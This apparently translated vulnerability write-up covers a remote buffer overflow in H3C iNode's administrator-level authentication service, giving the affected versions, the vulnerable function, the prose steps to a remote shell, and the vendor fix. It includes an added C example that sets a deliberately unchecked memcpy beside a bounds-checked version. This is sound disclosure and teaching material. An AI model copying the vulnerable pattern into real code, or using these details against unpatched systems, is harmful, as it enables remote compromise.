iNode remote buffer overflow: arbitrary code execution as Administrator (0day)

Source: Internet
Author: User

H3C iNode is client software developed by Hangzhou H3C Communication Technology Co., Ltd. for user authentication and internet access. The software contains a buffer overflow vulnerability: an attacker can remotely send crafted packets that trigger the overflow and execute shellcode.
The vulnerability lies in authenmngservice.exe, which is installed with the iNode software. The service runs as administrator and opens a port, and the module handling that port has a buffer overflow, so an attacker can remotely send UDP attack packets, trigger the overflow, and execute an attack shell. Affected versions: iNode PC 5.2 (E0402), iNode PC 5.1 (E0304) and iNode PC 5.0 (E0105); earlier versions can no longer be downloaded directly and were not verified. In the IDA disassembly the vulnerable code is in sub_459F10: the memcpy at 0x45A235 takes the number of bytes to copy from externally controlled data, so malicious input causes a remote buffer overflow. The author's proof-of-concept script, poc.py, sends such data to the service.


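The defect described above is a copy whose length is read from the datagram and never compared with the destination buffer. As an added example (not code from the write-up or from H3C; the four-byte header layout, the 64-byte buffer and the sample datagrams are constructed for illustration), the unchecked shape sits beside a hardened handler that drops any datagram whose declared length exceeds either what was received or the buffer:

```c
#include <stdint.h>
#include <string.h>

/* Constructed layout for this example (not the iNode wire format):
 * bytes 0-1 message type, bytes 2-3 payload length (big-endian), then payload. */
enum { HDR_LEN = 4, BUF_LEN = 64 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Vulnerable shape: the copy length comes from the packet and is never compared
 * with the destination, the defect the write-up places at the memcpy in sub_459F10. */
size_t handle_unchecked(const uint8_t *pkt, size_t pkt_len, uint8_t out[BUF_LEN])
{
    if (pkt_len < HDR_LEN) return 0;
    size_t n = rd16(pkt + 2);          /* externally controlled */
    memcpy(out, pkt + HDR_LEN, n);     /* overruns out when n > BUF_LEN */
    return n;
}

/* Hardened shape: the declared length must fit both what actually arrived and
 * the destination buffer; otherwise the datagram is dropped before any copy. */
int handle_checked(const uint8_t *pkt, size_t pkt_len, uint8_t out[BUF_LEN], size_t *copied)
{
    *copied = 0;
    if (pkt_len < HDR_LEN) return -1;          /* truncated header */
    size_t n = rd16(pkt + 2);
    if (n > pkt_len - HDR_LEN) return -1;      /* claims more than was received */
    if (n > BUF_LEN) return -1;                /* would overflow the destination */
    memcpy(out, pkt + HDR_LEN, n);
    *copied = n;
    return 0;
}

/* Builds a constructed datagram: header declaring 'declared' payload bytes,
 * followed by 'actual' bytes of 'A'. Returns the total length, or 0 if it won't fit. */
size_t build_pkt(uint8_t *dst, size_t cap, uint16_t declared, size_t actual)
{
    if (HDR_LEN + actual > cap) return 0;
    dst[0] = 0x00; dst[1] = 0x01;
    dst[2] = (uint8_t)(declared >> 8); dst[3] = (uint8_t)(declared & 0xff);
    memset(dst + HDR_LEN, 'A', actual);
    return HDR_LEN + actual;
}

/* Feeds a constructed datagram to the hardened handler: 0 accepted, -1 dropped. */
int checked_verdict(uint16_t declared, size_t actual)
{
    uint8_t pkt[HDR_LEN + 1024], out[BUF_LEN];
    size_t copied, len = build_pkt(pkt, sizeof pkt, declared, actual);
    return len ? handle_checked(pkt, len, out, &copied) : -1;
}
```

The second check (declared length against bytes actually received) matters as much as the buffer bound: without it a short datagram with a large length field makes the copy read past the receive buffer.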
After the software is installed, authenmngservice.exe runs as administrator. Start the attack program and enter the target IP address to launch the attack; the attacked service does not exit. Connecting with telnet then gives a remote logon to the target system while the attacked program is still running. Entering the calc.exe command starts the calculator, and calc.exe can be seen running with administrator privileges.

Solution: H3C has released a fix for this vulnerability and a new iNode version. Reference link: http://kms.h3c.com/kms/kms/search/view.html?Id=23553
